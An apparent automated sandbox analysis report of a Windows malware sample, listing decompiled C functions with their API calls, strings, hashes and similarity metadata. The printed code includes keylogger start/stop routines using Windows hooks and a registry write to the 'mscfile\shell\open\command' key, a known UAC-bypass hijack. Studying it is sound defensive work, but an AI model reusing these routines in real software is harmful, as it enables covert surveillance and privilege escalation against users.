				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t36;
				struct HINSTANCE__* _t37;
				struct HINSTANCE__* _t43;
				intOrPtr* _t44;
				intOrPtr* _t45;
				CHAR* _t49;
				struct HINSTANCE__* _t50;
				void* _t52;
				struct HINSTANCE__* _t55;
				intOrPtr* _t59;
				struct HINSTANCE__* _t64;
				intOrPtr _t65;

				_t52 = __ecx;
				if(_a4 == 2 || _a4 == 1) {
					E007872D9(_t52);
					GetModuleFileNameA(0, 0x7ab3c8, 0x104);
					_t49 =  *0x7aba3c; // 0x2d134d8
					 *0x7aba44 = 0x7ab3c8;
					if(_t49 == 0 ||  *_t49 == 0) {
						_t49 = 0x7ab3c8;
					}
					_v8 = 0;
					_v16 = 0;
					E0077CDAE(_t52, _t49, 0, 0,  &_v8,  &_v16);
					_t64 = E0077CF23(_v8, _v16, 1);
					if(_t64 != 0) {
						E0077CDAE(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t50 = E00786DF4(_t49, 0, _t64, _t64);
							if(_t50 == 0) {
								_t59 = _v12;
								_t55 = 0;
								_t36 = _t59;
								if( *_t59 == 0) {
									L15:
									_t37 = 0;
									 *0x7aba30 = _t55;
									_v12 = 0;
									_t50 = 0;
									 *0x7aba34 = _t59;
									L16:
									E007801F5(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x7aba30 = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x7aba34 = _t43;
						goto L10;
					} else {
						_t44 = E0077A504();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E007801F5(_t64);
						return _t50;
					}
				} else {
					_t45 = E0077A504();
					_t65 = 0x16;
					 *_t45 = _t65;
					E0077695D();
					return _t65;
				}
			}

0x0077cc8a
0x0077cc97
0x0077ccb7
0x0077ccca
0x0077ccd0
0x0077ccd6
0x0077ccde
0x0077cce5
0x0077cce5
0x0077ccea
0x0077ccf1
0x0077ccf8
0x0077cd0a
0x0077cd11
0x0077cd30
0x0077cd3c
0x0077cd57
0x0077cd5a
0x0077cd61
0x0077cd67
0x0077cd6e
0x0077cd71
0x0077cd73
0x0077cd77
0x0077cd81
0x0077cd81
0x0077cd83
0x0077cd89
0x0077cd8c
0x0077cd8e
0x0077cd94
0x0077cd95
0x0077cd9b
0x00000000
0x00000000
0x00000000
0x00000000
0x0077cd79
0x0077cd79
0x0077cd79
0x0077cd7c
0x0077cd7d
0x00000000
0x0077cd79
0x0077cd69
0x00000000
0x0077cd69
0x0077cd42
0x0077cd47
0x0077cd49
0x0077cd4b
0x00000000
0x0077cd13
0x0077cd13
0x0077cd18
0x0077cd1a
0x0077cd1b
0x0077cd50
0x0077cd50
0x0077cd9e
0x0077cd9f
0x00000000
0x0077cda8
0x0077cc9f
0x0077cc9f
0x0077cca6
0x0077cca7
0x0077cca9
0x00000000
0x0077ccae

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0077CCCA
_free.LIBCMT ref: 0077CD95
_free.LIBCMT ref: 0077CD9F

Strings

C:\Windows\SysWOW64\mobsync.exe, xrefs: 0077CCC1, 0077CCC8, 0077CCF7, 0077CD2F

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: _free$FileModuleName
String ID: C:\Windows\SysWOW64\mobsync.exe
API String ID: 2506810119-2325505231
Opcode ID: a586464b1e4140fdb0f4b4383b246a190249612c2b0b0b823a82584187188dd1
Instruction ID: 301f5936ab906c8860a55e2f18b181d9bf9e3356a4f1283efb09a3b5cd6c53f5
Opcode Fuzzy Hash: a586464b1e4140fdb0f4b4383b246a190249612c2b0b0b823a82584187188dd1
Instruction Fuzzy Hash: F6316175B00258EFDF22DF99D88599EBFBCEB89350B10806AF50997211DB784E44DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0074951E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0074951E(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00742084(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				E007572DA(_t31,  &_v28);
				E00749634(__ebx, _t29, _t35);
				E00741FC7();
				_t32 = _t31 - 0x18;
				E00742084(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00742084(_t19, _t32 - 0x18, "[Info]");
				E00756C80(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}

0x0074951e
0x00749525
0x00749528
0x0074952c
0x007495a1
0x00000000
0x007495a1
0x0074952e
0x00749537
0x0074953c
0x00749544
0x0074954b
0x00749553
0x00749558
0x0074955e
0x0074956d
0x00749572
0x0074957a
0x00749581
0x0074958b
0x00749594
0x0074959a
0x0074959a
0x00000000

APIs

Part of subcall function 00749634: GetLocalTime.KERNEL32(?,Offline Keylogger Started,007AC350), ref: 00749642
Part of subcall function 00749634: wsprintfW.USER32 ref: 007496C3
Part of subcall function 00749634: SetEvent.KERNEL32(00000000,00000000), ref: 007496ED

Part of subcall function 00756C80: GetLocalTime.KERNEL32(00000000), ref: 00756C9A

CloseHandle.KERNEL32(?), ref: 00749581
UnhookWindowsHookEx.USER32 ref: 00749594

Strings

[Info], xrefs: 00749568
Online Keylogger Stopped, xrefs: 0074952E, 00749536, 0074955D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
String ID: Online Keylogger Stopped$[Info]
API String ID: 3650414481-1913360614
Opcode ID: 73ad4bf79a49c977020416a675f408c9bf440ed0b4013bf0813a03fd203d3525
Instruction ID: d9137c4eb59af7a010835c96811311df461bd8e6bfd273ef8effb20280091111
Opcode Fuzzy Hash: 73ad4bf79a49c977020416a675f408c9bf440ed0b4013bf0813a03fd203d3525
Instruction Fuzzy Hash: DE012431A002009BDB267768D80F7BFBBB59B42310FD0005DFA8142192EFAD186BC3D6

Uniqueness

Uniqueness Score: -1.00%

Function 0074C0AB, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 0074C119

Strings

ios_base::eofbit set, xrefs: 0074C108
ios_base::badbit set, xrefs: 0074C0D5
ios_base::failbit set, xrefs: 0074C0FB

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: Exception@8Throw
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 2005118841-1866435925
Opcode ID: 7cbb648426846c97f0823c96b1823e7cafe5ca021b0a8a7b2c8783e863c508aa
Instruction ID: a3b7955fd667a2d1ab013d518b64c7696cfc01801cf04945db09ba674612ea19
Opcode Fuzzy Hash: 7cbb648426846c97f0823c96b1823e7cafe5ca021b0a8a7b2c8783e863c508aa
Instruction Fuzzy Hash: A101D1B098120CFAEB91EA50CC17FBA73689B54740F90C418BA12590D3DB6DA902C662

Uniqueness

Uniqueness Score: -1.00%

Function 00750A30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00750A30(char* __edx, char* _a4, char* _a8, int _a12, intOrPtr _a16, intOrPtr _a20) {
				void* _v12;
				char _v1040;
				long _t17;

				if(RegOpenKeyExA(0x80000001, __edx, 0, 0x20019,  &_v12) != 0) {
					L3:
					return 0;
				}
				_t17 = RegQueryValueExA(_v12, _a4, 0, 0, _a8,  &_a12);
				RegCloseKey(_v12);
				if(_t17 != 0) {
					goto L3;
				}
				E00745A7C( &_v1040, _a16, _a20);
				E00745B03( &_v1040, _a8, _a12);
				return 1;
			}

0x00750a54
0x00750aa0
0x00000000
0x00750aa0
0x00750a65
0x00750a70
0x00750a78
0x00000000
0x00000000
0x00750a86
0x00750a97
0x00000000

APIs

RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,origmsc), ref: 00750A4C
RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,000003E8,?), ref: 00750A65
RegCloseKey.ADVAPI32(00000000), ref: 00750A70

Strings

origmsc, xrefs: 00750A3C

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: origmsc
API String ID: 3677997916-68016026
Opcode ID: 30febd10602b9f4b81ddabf227af30c110e75e057bd6454789b51388825f270a
Instruction ID: 5542fd894884b8591e70dd5342a0991bdb111662c91311fe0839a0e321caefd4
Opcode Fuzzy Hash: 30febd10602b9f4b81ddabf227af30c110e75e057bd6454789b51388825f270a
Instruction Fuzzy Hash: BF014B3580022DFBCF219FA5DC49DEB7F29EF05750F008151BE0862061E7758A69DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 0075094E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
registryCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E0075094E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x79f724);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0074427F(_t17, _t21);
				return _t21;
			}

0x0075095c
0x0075096b
0x00750980
0x007509ab
0x00750982
0x00750993
0x0075099c
0x007509a8
0x007509a8
0x007509b2
0x007509be

APIs

RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,007AC578,?), ref: 00750978
RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00750993
RegCloseKey.ADVAPI32(00000000), ref: 0075099C

Strings

http\shell\open\command, xrefs: 0075096E

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseOpenQueryValue
String ID: http\shell\open\command
API String ID: 3677997916-1487954565
Opcode ID: 0ed65a816075ce9e8809e83240ee1c3ee8d794f77829b505d5fc50e5e89be960
Instruction ID: 80dbcd156e5c481761afa856e28d1d5251c25b1e1a535ae7f5334ad534feefe7
Opcode Fuzzy Hash: 0ed65a816075ce9e8809e83240ee1c3ee8d794f77829b505d5fc50e5e89be960
Instruction Fuzzy Hash: C8F0C275600108FBEB20DA99EC09EDFBBBCEB84B01F1081A6B945E2111DBB45F5587A0

Uniqueness

Uniqueness Score: -1.00%

Function 00750B4C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39
registryCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E00750B4C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E00742489();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, E00741EEB( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				E00741EF0();
				return _t23;
			}

0x00750b4f
0x00750b50
0x00750b5f
0x00750b9f
0x00750b61
0x00750b65
0x00750b86
0x00750b91
0x00750b9a
0x00750b9a
0x00750ba4
0x00750baf

APIs

RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,007ABB08), ref: 00750B57
RegSetValueExW.ADVAPI32(007ABB08,0079F724,00000000,00000000,00000000,00000000,0079F724,?,80000001,?,00746020,0079F724,007ABB08), ref: 00750B86
RegCloseKey.ADVAPI32(007ABB08,?,80000001,?,00746020,0079F724,007ABB08), ref: 00750B91

Strings

Software\Classes\mscfile\shell\open\command, xrefs: 00750B55

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: CloseCreateValue
String ID: Software\Classes\mscfile\shell\open\command
API String ID: 1818849710-505396733
Opcode ID: 9a4f683064e69e4225ecb58df2c8297c1d9046759c9d9fea0d3eb7b29c4dc773
Instruction ID: c0b3d1c5b4dc1482e3fdd681d1af8349ce1cc5bdc0cfd7fe3e40a7ed02e07804
Opcode Fuzzy Hash: 9a4f683064e69e4225ecb58df2c8297c1d9046759c9d9fea0d3eb7b29c4dc773
Instruction Fuzzy Hash: 12F0A972400118FBDF00AFA8EC4AEEA376DEB04751F508615BC0596120EB399F18DB90

Uniqueness

Uniqueness Score: -1.00%

Function 007413AD, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007413AD() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x7ac5e4 = _t2;
				return _t2;
			}

0x007413be
0x007413c4
0x007413c9

APIs

GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 007413B7
GetProcAddress.KERNEL32(00000000), ref: 007413BE

Strings

GetCursorInfo, xrefs: 007413AD
User32.dll, xrefs: 007413B2

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: GetCursorInfo$User32.dll
API String ID: 1646373207-2714051624
Opcode ID: dfec107a9365f7cea26858f05c9506deeb647ff147d17920e462b70cbae97c3f
Instruction ID: af9a85911abc47755b7f6ee536c405b7a52868883d66ace9a53b50f9aebee518
Opcode Fuzzy Hash: dfec107a9365f7cea26858f05c9506deeb647ff147d17920e462b70cbae97c3f
Instruction Fuzzy Hash: DCB092F5982600FF86016BA4AD0D8093AB4F6D6B023108152B501C21A0CB7C81019F18

Uniqueness

Uniqueness Score: -1.00%

Function 00741468, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00741468() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x7aca80 = _t2;
				return _t2;
			}

0x00741479
0x0074147f
0x00741484

APIs

LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 00741472
GetProcAddress.KERNEL32(00000000), ref: 00741479

Strings

GetLastInputInfo, xrefs: 00741468
User32.dll, xrefs: 0074146D

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetLastInputInfo$User32.dll
API String ID: 2574300362-1519888992
Opcode ID: 58a68819c280b6d2402580d4764d607062eb8f4cdda9c8232f33024e139d8f13
Instruction ID: 3e714a470638673ba01dfdcb21a82bd0188c2a8d451d2b4540e421c676b52419
Opcode Fuzzy Hash: 58a68819c280b6d2402580d4764d607062eb8f4cdda9c8232f33024e139d8f13
Instruction Fuzzy Hash: F7B092F4640700EB8A019BB8AD0D8093A7AB6C6702700C246F506821A0CB7C8101AB29

Uniqueness

Uniqueness Score: -1.00%

Function 00741485, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00741485() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x7aca84 = _t2;
				return _t2;
			}

0x00741496
0x0074149c
0x007414a1

APIs

LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 0074148F
GetProcAddress.KERNEL32(00000000), ref: 00741496

Strings

GetConsoleWindow, xrefs: 00741485
kernel32.dll, xrefs: 0074148A

Memory Dump Source

Source File: 0000001C.00000002.416250521.0000000000740000.00000040.00000001.sdmp, Offset: 00740000, based on PE: true

Associated: 0000001C.00000002.416426538.00000000007AF000.00000040.00000001.sdmp Download File

Yara matches

Similarity

API ID: AddressLibraryLoadProc
String ID: GetConsoleWindow$kernel32.dll
API String ID: 2574300362-100875112
Opcode ID: cfa5eac718b5d21d85367b4758c021dd532fe87c98521b9323549974a113ec3f
Instruction ID: f28ac28f1bdd1b52de6632ace039c1753300410c38fc741c4a69868ab06b29ae
Opcode Fuzzy Hash: cfa5eac718b5d21d85367b4758c021dd532fe87c98521b9323549974a113ec3f
Instruction Fuzzy Hash: BCB092F4542300EB8A019BB4AE0D8093B7AB68A706701C546B601821A4CA7C41019B29

Uniqueness

Uniqueness Score: -1.00%

Function 00783812, Relevance: 6.3, APIs: 4, Instructions: 305
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00783812(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				E00775507(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x74000000
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00790DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00790DE0( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00771F00(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00790DE0( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00790AE0();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00790AE0();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00790AE0();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00783B15(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00790EC0(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = E0077A504();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0077695D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}

0x00783812
0x0078381d
0x00783824
0x00783826
0x00783826
0x00783828
0x00783831
0x00783833
0x00783838
0x0078383e
0x00783854
0x00783859
0x0078385c
0x00783869
0x0078386e
0x007838c2
0x007838ca
0x007838cc
0x007838ce
0x007838d1
0x007838d1
0x007838d1
0x007838d7
0x007838df
0x007838f2
0x007838f5
0x007838f7
0x007838fa
0x007838fb
0x0078391c
0x0078391f
0x0078391f
0x007838fd
0x007838fd
0x007838ff
0x0078390a
0x0078390a
0x0078390c
0x00783913
0x0078390e
0x0078390e
0x0078390e
0x0078390c
0x00783920
0x00783922
0x00783923
0x00783926
0x00783928
0x00783932
0x0078393c
0x0078392a
0x0078392a
0x0078392a
0x00783941
0x00783941
0x00783946
0x00783949
0x00783954
0x00783954
0x00783954
0x00783954
0x00783958
0x0078395f
0x00783960
0x00783963
0x00783966
0x00783966
0x00783968
0x00000000
0x00000000
0x00783980
0x00783987
0x0078398b
0x0078398e
0x00783991
0x00783993
0x00783993
0x00783993
0x00783995
0x00783998
0x0078399b
0x0078399d
0x007839a5
0x007839ab
0x007839ae
0x007839b1
0x007839b2
0x007839b5
0x007839b8
0x007839b8
0x007839bd
0x007839c0
0x00000000
0x00000000
0x007839d8
0x007839dd
0x007839e1
0x00000000
0x00000000
0x007839e5
0x007839e5
0x007839e8
0x007839e9
0x007839e9
0x007839eb
0x007839ee
0x00000000
0x00000000
0x007839f0
0x007839f3
0x007839fa
0x007839fd
0x00783a00
0x00783a16
0x00783a16
0x00783a16
0x00783a02
0x00783a02
0x00783a04
0x00783a07
0x00783a12
0x00783a09
0x00783a0c
0x00783a0c
0x00783a07
0x00000000
0x00783a00
0x007839f5
0x007839f5
0x007839f7
0x007839f7
0x0078394b
0x0078394b
0x0078394e
0x00783a19
0x00783a19
0x00783a1b
0x00783a1d
0x00783a20
0x00783a21
0x00783a22
0x00783a23
0x00783a2b
0x00783a2b
0x00783a2b
0x00783a2d
0x00783a30
0x00783a33
0x00783a35
0x00783a35
0x00783a37
0x00783a49
0x00783a4d
0x00783a50
0x00783a57
0x00783a5f
0x00783a5f
0x00783a62
0x00783a64
0x00783a75
0x00783a75
0x00783a79
0x00783a79
0x00783a7c
0x00783a7e
0x00783a81
0x00000000
0x00783a66
0x00783a66
0x00783a6c
0x00783a6c
0x00783a70
0x00783a83
0x00783a83
0x00783a87
0x00783a88
0x00783a8a
0x00783a8c
0x00783acd
0x00783acd
0x00783acf
0x00783adc
0x00783adc
0x00783ade
0x00783ae0
0x00783ae1
0x00783ae2
0x00783ae9
0x00783aec
0x00783aee
0x00783aee
0x00783aef
0x00783af1
0x00783af4
0x00783af4
0x00783af6
0x00783af8
0x00000000
0x00783af8
0x00783ad1
0x00783ad3
0x00000000
